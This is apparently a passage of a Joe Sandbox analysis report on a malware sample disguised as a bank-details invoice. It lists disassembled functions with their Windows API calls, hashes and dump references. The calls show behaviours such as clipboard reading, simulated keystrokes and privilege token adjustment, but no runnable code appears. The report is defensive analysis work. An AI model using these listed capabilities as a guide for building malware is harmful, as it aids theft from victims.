                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a4f61d150d3662a10e48d0cbe765be36fd231166f6f044c5831e0971291a83a4
                    • Instruction ID: 17372833fb5c9150077befdee8e92c4c4c70ddeec9c72babc14071f5d83fabf3
                    • Opcode Fuzzy Hash: a4f61d150d3662a10e48d0cbe765be36fd231166f6f044c5831e0971291a83a4
                    • Instruction Fuzzy Hash: A32146705086018FDB24EF29C444A1FBBE1BF89308F14496EE99A47322C739F85ACF56
                    Function 0049AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___lock_fhandle.LIBCMT ref: 0049AFC0
                      • Part of subcall function 00497BDA: __getptd_noexit.LIBCMT ref: 00497BDA
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit$___lock_fhandle
                    • String ID:
                    • API String ID: 1144279405-0
                    • Opcode ID: 8abdae171ad8ccc52017548ce7ba9e7fee92d1f65598ad568e8920f959179c4a
                    • Instruction ID: 66e7efa09ce88cf9818ea10a652857484d30a7c4afbd7ec2b9afc84fd1113d0b
                    • Opcode Fuzzy Hash: 8abdae171ad8ccc52017548ce7ba9e7fee92d1f65598ad568e8920f959179c4a
                    • Instruction Fuzzy Hash: AD11B6728146104BDF117FA5990275A3E60EF41339F16426AE4340B2E2D7BC9D109BEA
                    Function 004739DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                    • Instruction ID: a9785c1ff9f502088b29672c70055d4f966b7c7ba358923213a7472043add32b
                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                    • Instruction Fuzzy Hash: 53018631500109AECF04EF65C8828FEBB78EF20344F00C06BB516971A5EB349A49DB68
                    Function 00492AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00492AED
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 71d9f5014592076cc1a56416258bbc525fa943090f811855314339f0a9c18f09
                    • Instruction ID: c3384e78077c419b81c5dcc18cb9a721512d7dd8752ef139f4bc1fb70943b5fd
                    • Opcode Fuzzy Hash: 71d9f5014592076cc1a56416258bbc525fa943090f811855314339f0a9c18f09
                    • Instruction Fuzzy Hash: FBF0C232500205BADF21AF668D0679F3EA1BF40318F15443BF4149A1A1D7BC8A12DB49
                    Function 00474252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,?,?,?,004739FE,?,00000001), ref: 00474286
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 71b7c31b63c980511e0136ef7f6d2f04cfe903a3e86883155336337c38c11e03
                    • Instruction ID: 4d1bc2c8991b85fed5e69fd743ce051378a5d0f78f6e696b193576ddfcbc4fd8
                    • Opcode Fuzzy Hash: 71b7c31b63c980511e0136ef7f6d2f04cfe903a3e86883155336337c38c11e03
                    • Instruction Fuzzy Hash: C5F08C70404301DFCB348F60D480862BBE4AF44365320CABFF1DA82611C7359860CB49
                    Function 004740A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004740C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LongNamePath
                    • String ID:
                    • API String ID: 82841172-0
                    • Opcode ID: 4ca94665d4d2f96c58934624211cf351b73af4a0b5635e6890b5f51b73dd6085
                    • Instruction ID: 0dff38657207ae53e1d4aa01350b5ceea960e5969e88031c0bd82bdc29a607f0
                    • Opcode Fuzzy Hash: 4ca94665d4d2f96c58934624211cf351b73af4a0b5635e6890b5f51b73dd6085
                    • Instruction Fuzzy Hash: 2CE07D329001241BC711E354CC42FFA379DDF88694F050075F908D3204DA64D9808694
                    Function 01340608 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 01340613
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction ID: 2e7092284a39f96586333d4b3c0b4b498b218758c28a9c4ec41a8648cd92465c
                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                    • Instruction Fuzzy Hash: DDE0863060510CDBDB18CABC89046E973E8E744334F204654FA07C31C0D538A900D690
                    Function 013405D8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?), ref: 013405E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction ID: fb0ac2f5f3eb32f03e5f5e14d5888d65445d7d2743cae647ecec780d78659874
                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                    • Instruction Fuzzy Hash: AFD0A730A4920CEBCB10CFBC9D089DD77ECE705364F004794FE15C3280D535A9009790
                    Function 01341FE4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 289ab1136e7531ee069c3c6f4742e8876263440c86d9cee0f9c58bda870e5a49
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: E6E09A7494010DAFDB10DFA4D5496AE7BB4EF04301F1005A1FD05A6691DA319A549A62
                    Function 01341FE8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 7fbf83c36c5ee5824f236a11526fc1a52c882b1bd79b16f9af86ff33988c4082
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: C8E0E67494010DDFDB00DFB4D5496AE7BF4EF04301F100161FD01E2281D6319D50DA72

                    Non-executed Functions

                    Function 004DF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 004DF87D
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004DF8DC
                    • GetWindowLongW.USER32(?,000000F0), ref: 004DF919
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004DF940
                    • SendMessageW.USER32 ref: 004DF966
                    • _wcsncpy.LIBCMT ref: 004DF9D2
                    • GetKeyState.USER32(00000011), ref: 004DF9F3
                    • GetKeyState.USER32(00000009), ref: 004DFA00
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004DFA16
                    • GetKeyState.USER32(00000010), ref: 004DFA20
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004DFA4F
                    • SendMessageW.USER32 ref: 004DFA72
                    • SendMessageW.USER32(?,00001030,?,004DE059), ref: 004DFB6F
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 004DFB85
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004DFB96
                    • SetCapture.USER32(?), ref: 004DFB9F
                    • ClientToScreen.USER32(?,?), ref: 004DFC03
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004DFC0F
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 004DFC29
                    • ReleaseCapture.USER32 ref: 004DFC34
                    • GetCursorPos.USER32(?), ref: 004DFC69
                    • ScreenToClient.USER32(?,?), ref: 004DFC76
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004DFCD8
                    • SendMessageW.USER32 ref: 004DFD02
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004DFD41
                    • SendMessageW.USER32 ref: 004DFD6C
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004DFD84
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004DFD8F
                    • GetCursorPos.USER32(?), ref: 004DFDB0
                    • ScreenToClient.USER32(?,?), ref: 004DFDBD
                    • GetParent.USER32(?), ref: 004DFDD9
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004DFE3F
                    • SendMessageW.USER32 ref: 004DFE6F
                    • ClientToScreen.USER32(?,?), ref: 004DFEC5
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004DFEF1
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004DFF19
                    • SendMessageW.USER32 ref: 004DFF3C
                    • ClientToScreen.USER32(?,?), ref: 004DFF86
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004DFFB6
                    • GetWindowLongW.USER32(?,000000F0), ref: 004E004B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 2516578528-4164748364
                    • Opcode ID: 0ec9bce6a0200073915add669758d5783858191cfc35e25fcfbe87233af1b312
                    • Instruction ID: 76a224cd4d849c6fe3feecb94f12f0daacbc647138046e3d1ec33d42e03404aa
                    • Opcode Fuzzy Hash: 0ec9bce6a0200073915add669758d5783858191cfc35e25fcfbe87233af1b312
                    • Instruction Fuzzy Hash: 9F32DC70604640EFDB20DF64C894BAABBA5FF49348F04062BF696873A0C734DD59DB5A
                    Function 004DAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004DB1CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: c9d74d92a1207640f5f45bd2f9831278ab79fceb7e1522b8c60aee2817e6a7e6
                    • Instruction ID: 573412202b15e3149f13030e09f02ceb29888fbffb5cd1b784cd22fa036152df
                    • Opcode Fuzzy Hash: c9d74d92a1207640f5f45bd2f9831278ab79fceb7e1522b8c60aee2817e6a7e6
                    • Instruction Fuzzy Hash: C112CD71900208ABEB249F64CC69FAF7BB5FF45710F10412BF919DA390DBB88902CB59
                    Function 0048EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0048EB4A
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E3AEA
                    • IsIconic.USER32(000000FF), ref: 004E3AF3
                    • ShowWindow.USER32(000000FF,00000009), ref: 004E3B00
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3B0A
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004E3B20
                    • GetCurrentThreadId.KERNEL32 ref: 004E3B27
                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004E3B33
                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004E3B44
                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004E3B4C
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004E3B54
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3B57
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B6C
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B77
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B81
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B86
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B8F
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B94
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B9E
                    • keybd_event.USER32(00000012,00000000), ref: 004E3BA3
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3BA6
                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 004E3BCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: b6f2ec0d6bc8732d0990be2453535c65bb335616aec9f54d3f4d342a34fa9e54
                    • Instruction ID: 842782f151f543faba8efba9500dd5075ad5a424d881215ca453811844915aca
                    • Opcode Fuzzy Hash: b6f2ec0d6bc8732d0990be2453535c65bb335616aec9f54d3f4d342a34fa9e54
                    • Instruction Fuzzy Hash: 0231B271A40218BFEB216F728C49F7F3E6DEB44B51F104026FA05EB1D1C6B46D10EAA8
                    Function 004AACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                      • Part of subcall function 004AB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                      • Part of subcall function 004AB134: GetLastError.KERNEL32 ref: 004AB1BA
                    • _memset.LIBCMT ref: 004AAD08
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004AAD5A
                    • CloseHandle.KERNEL32(?), ref: 004AAD6B
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004AAD82
                    • GetProcessWindowStation.USER32 ref: 004AAD9B
                    • SetProcessWindowStation.USER32(00000000), ref: 004AADA5
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004AADBF
                      • Part of subcall function 004AAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004AACC0), ref: 004AAB99
                      • Part of subcall function 004AAB84: CloseHandle.KERNEL32(?,?,004AACC0), ref: 004AABAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $H*R$default$winsta0
                    • API String ID: 2063423040-3454619666
                    • Opcode ID: f7d9094de181f73fc9620cde75727d5a1646daa70be4020df743ae75e9785afd
                    • Instruction ID: f831b1225cfa0c78c6781eb2dec85cd9ccc831d210de2449f68576b6ec87f785
                    • Opcode Fuzzy Hash: f7d9094de181f73fc9620cde75727d5a1646daa70be4020df743ae75e9785afd
                    • Instruction Fuzzy Hash: E081A171800209AFDF11DFA4CD45AEF7B79FF16308F04412AF914A62A1D7398E64DB6A
                    Function 004B60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004B5FA6,?), ref: 004B6EF1
                      • Part of subcall function 004B725E: __wsplitpath.LIBCMT ref: 004B727B
                      • Part of subcall function 004B725E: __wsplitpath.LIBCMT ref: 004B728E
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • _wcscat.LIBCMT ref: 004B6149
                    • _wcscat.LIBCMT ref: 004B6167
                    • __wsplitpath.LIBCMT ref: 004B618E
                    • FindFirstFileW.KERNEL32(?,?), ref: 004B61A4
                    • _wcscpy.LIBCMT ref: 004B6209
                    • _wcscat.LIBCMT ref: 004B621C
                    • _wcscat.LIBCMT ref: 004B622F
                    • lstrcmpiW.KERNEL32(?,?), ref: 004B625D
                    • DeleteFileW.KERNEL32(?), ref: 004B626E
                    • MoveFileW.KERNEL32(?,?), ref: 004B6289
                    • MoveFileW.KERNEL32(?,?), ref: 004B6298
                    • CopyFileW.KERNEL32(?,?,00000000), ref: 004B62AD
                    • DeleteFileW.KERNEL32(?), ref: 004B62BE
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004B62E1
                    • FindClose.KERNEL32(00000000), ref: 004B62FD
                    • FindClose.KERNEL32(00000000), ref: 004B630B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                    • String ID: \*.*
                    • API String ID: 1917200108-1173974218
                    • Opcode ID: 3cce2b1e4e3d621b5ea16fa7ef0138270953298458d3d62e9fc02cc3f0b05940
                    • Instruction ID: f3a7e8f38a9bc2d99df0cdbda946da89178f9ec1acd46bf72ec28d118f3661da
                    • Opcode Fuzzy Hash: 3cce2b1e4e3d621b5ea16fa7ef0138270953298458d3d62e9fc02cc3f0b05940
                    • Instruction Fuzzy Hash: FE510072C0811C6ADB25EBA6CC45DEB77BCAF05304F0A01EBE545E2141DE3A9749CFA9
                    Function 004C6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(0050DC00), ref: 004C6B36
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 004C6B44
                    • GetClipboardData.USER32(0000000D), ref: 004C6B4C
                    • CloseClipboard.USER32 ref: 004C6B58
                    • GlobalLock.KERNEL32(00000000), ref: 004C6B74
                    • CloseClipboard.USER32 ref: 004C6B7E
                    • GlobalUnlock.KERNEL32(00000000), ref: 004C6B93
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 004C6BA0
                    • GetClipboardData.USER32(00000001), ref: 004C6BA8
                    • GlobalLock.KERNEL32(00000000), ref: 004C6BB5
                    • GlobalUnlock.KERNEL32(00000000), ref: 004C6BE9
                    • CloseClipboard.USER32 ref: 004C6CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
